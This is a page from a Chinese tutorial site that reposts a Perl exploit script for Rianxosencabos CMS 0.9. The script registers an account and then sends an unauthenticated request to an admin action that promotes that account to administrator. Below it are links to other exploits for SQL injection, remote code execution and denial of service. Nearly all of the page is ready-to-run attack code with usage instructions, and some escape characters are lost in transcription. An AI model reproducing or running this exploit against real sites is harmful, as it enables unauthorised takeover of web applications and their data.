手机
当前位置:查字典教程网 >网络安全 >Exploit >Rianxosencabos CMS 0.9 Remote Add Admin Exploit
Rianxosencabos CMS 0.9 Remote Add Admin Exploit
摘要:#!/usr/bin/perl-w#RianxosencabosCMS0.9RemoteAddAdminExploit#Download:h...

#!/usr/bin/perl -w # Rianxosencabos CMS 0.9 Remote Add Admin Exploit

# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz # written by ka0x <ka0x01 [at] gmail [dot] com>

# D.O.M Labs - Security Researchers

# - www.domlabs.org - use LWP::UserAgent; my ($host, $login, $pass, $mail, $user_id) = @ARGV ; unless($ARGV[4]){

print "[*] usage: perl $0 <host> <login> <pass> <mail> <user_id>n";

print "[*] ex: perl $0 http://localhost/ ka0x 12345 ka0x01[at]gmail.com 2n";

exit 1;

} if ($host !~ /^http:/){ $host = 'http://'.$host; } my $ua = LWP::UserAgent->new() or die ;

$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;

$ua->timeout(10) ; sub __CREATE { my $req = HTTP::Request->new(POST => $host."index.php?s=usuarios&accion=registrar") ;

$req->content_type('application/x-www-form-urlencoded') ;

$req->content("reg_login=".$login."&reg_pass=".$pass."&reg_repass=".$pass."&reg_nombre=".$login."&reg_mail=".$mail."&submit_register=Rexistrar") ; my $res = $ua->request($req) ;

my $location = $res->header('Location') ;

if ($location =~ /Usuario creado/i) {

print "[ ] user added: ".$login ;

print "n[ ] password: ".$pass, "n" ;

} else{

print "[-] Exploit Failed!n" ;

}

} &__CREATE ; sub __ADMIN {

my $req = HTTP::Request->new(POST => $host."?s=admin&accion=lista") ; $req->content_type('application/x-www-form-urlencoded') ; $req->content($user_id."=0&inputOculto=".$user_id) ; $ua->request($req) ;

} &__ADMIN ;

__END__

【Rianxosencabos CMS 0.9 Remote Add Admin Exploit】相关文章:

TGS CMS 0.3.2r2 Remote Code Execution Exploit

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

上一篇: iGaming CMS
精品推荐
分类导航